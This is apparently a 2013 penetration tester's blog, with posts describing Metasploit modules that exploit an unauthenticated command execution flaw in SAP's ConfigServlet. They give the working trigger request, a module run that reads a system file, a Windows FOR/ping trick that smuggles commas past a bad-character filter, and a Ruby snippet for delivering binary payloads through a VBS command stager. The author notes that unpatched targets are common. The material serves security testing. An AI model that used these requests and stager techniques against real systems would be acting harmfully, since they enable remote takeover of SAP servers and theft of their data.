Wednesday, April 24, 2013

SAP ConfigServlet remote code execution metasploit module

Still SAP, still the same OS command execution vulnerability I mentioned in my previous post. But what is the difference? Well, it is good if you can run OS commands on the target system but probably you would like something more. Yes, I am talking about binary payloads.

After making my SAP ConfigServlet OS Command Execution metasploit module, I started to create a new module for remote code execution.

As it is possible to execute OS commands through the ConfigServlet it is relatively easy to deliver binary payloads and execute them through metasploit's command stagers. These stagers convert the binary payloads to ASCII deliverable format and use OS commands to write out the payload and the stager line by line and finally execute the payload through the dropped stager. Because VBS is more common in windows environment than PS I chose CmdStagerVBS.

I made my draft module and I started to test it. Everything looked fine but the exploitation failed. After I analysed the dropped files I realised that the payload file was good but there were problems with the stager VBS file's content and size.

The stager file comes from /data/exploits/cmdstager/vbs_b64 file. I made some test on the requests and I figured out that the comma character in the HTTP request is a bad character, therefore it cannot be used directly, although it is necessary to build the stager file as it contains some:
$ cat vbs_b64 | grep -n ","
4:echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
6:echo data = Replace(data, vbCrLf, "") >>decode_stub
9:echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("DECODED", 2, True) >>decode_stub
13:echo "DECODED", 0, false >>decode_stub
18:echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
20:echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
21:echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
22:echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
23:echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
38:echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
Fortunately, there was no problem with the payload file as it contains only base64 encoded payload. So how is it possible to write out commas through OS command execution without using them? In linux environment it is an easy question because you have tons of possibilities to use script languages and tools but in windows it is not trivial.

With "FOR" command it is possible to pick up strings from the right places of command outputs (thanks to my colleague Laszlo Toth who helped me figure this out) into variable that can be used later in "echo" command, therefore if there is a command that has a comma in its output then it can be used to avoid commas in the HTTP requests. To create reliable solution I had to find a command that works in the same way in every windows version and its output contains the comma character in the same place and of course language independently.

Look at the output of the ping command:
C:\Users\andrew>ping -n 1

Pinging with 32 bytes of data:
Reply from bytes=32 time<1ms TTL=128

Ping statistics for
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
At the statistics part of the output there is a comma character after the closing bracket and this is the same in every language! Perfect!

Putting it all together with the following command line trick I was able to echo out commas without directly using them.
C:\Users\andrew>FOR /F "usebackq tokens=2 delims=)" %i IN (`"ping -n 1| findstr )"`) DO @echo comma: %i
comma: ,
I made the necessary improvements in my module to handle those lines that contain commas and it just worked like a charm:
if command.include?(".vbs") and command.include?(",")
    command.gsub!(",", "%i")
    command = "cmd /c FOR /F \"usebackq tokens=2 delims=)\" %i IN (\`\"ping -n 1| findstr )\"\`) DO " + command
In the end with my SAP ConfigServlet Remote Code Execution module it is possible to deliver and execute binary metasploit payloads and custom binaries as well.

Check the updates section in this post to access the code and to follow the life of my module.


Sunday, April 21, 2013

SAP ConfigServlet OS command execution metasploit module

If you ever tried to search for SAP vulnerabilities then I am sure you met some form of ERPScan's team awesome researches. This happened in our current pentest project as well. A colleague of mine identified several SAP systems in the target network range and we tried to find well known vulnerabilities for them.

We found a great presentation (Breaking SAP Portal) from Hacker Halted 2012 by Dmitry Chastuchin from ERPScan. One of the slides contains a very interesting screenshot about an exploitation of a simple, remote, authentication less OS command execution vulnerability. Yes, with a simple GET request it is possible to execute OS commands on the remote system. I tried to search for existing exploit implementations for this vulnerability but there were no public metasploit or other exploits available. Surprisingly not just exploits were not available but there were no relevant search results to this vulnerability so I decided to create a metasploit module for that.

The vulnerability exists in the /ctc/servlet/ConfigServlet servlet, where with the proper parameters you can achieve OS command execution.

To trigger the vulnerability you only have to request something like this:
GET /ctc/servlet/ConfigServlet?;EXECUTE_CMD;CMDLINE=whoami
And the servlet will happily execute your commands from CMDLINE parameter and pass its output to the generated HTTP response. However, there are vendor patches for this vulnerability, you know how frequently companies apply them, so you have good chance to find a vulnerable version and exploit this vulnerability successfully.

It was easy to implement this exploit in metasploit. You can see my module in action:
msf auxiliary(sap_configservlet_exec_noauth) > show options 

Module options (auxiliary/admin/sap/sap_configservlet_exec_noauth):

   Name       Current Setting                 Required  Description
   ----       ---------------                 --------  -----------
   CMD        cmd /c type c:\windows\win.ini  yes       The command to execute
   Proxies                                    no        Use a proxy chain
   RHOST                     yes       The target address
   RPORT      50000                           yes       The target port
   TARGETURI  /ctc/servlet                    yes       Path to ConfigServlet
   VHOST                                      no        HTTP server virtual host

msf auxiliary(sap_configservlet_exec_noauth) > run

[*] - Sending remote command: cmd /c type c:\windows\win.ini
[+] - Exploited successfully - Command: cmd /c type c:\windows\win.ini - Output: TYPE=S
INFO_SHORT=     + Process created!
; for 16-bit app support
[mci extensions]

[*] Auxiliary module execution completed
msf auxiliary(sap_configservlet_exec_noauth) >
As you can see the received output after the "Process created!" contains the output of the executed command.

Check the updates section in this post to access the code and to follow the life of my module.


Saturday, April 20, 2013

First post

Hi Folks,

During my career in IT Security there have been plenty of interesting situations, developments, ideas etc. that would have been good to share but somehow I had never started to write public articles. This is gonna change and this is why I have created this blog.

Hopefully I will have enough time to create posts and you will enjoy them.
Please feel free to contact me and send me any suggestions.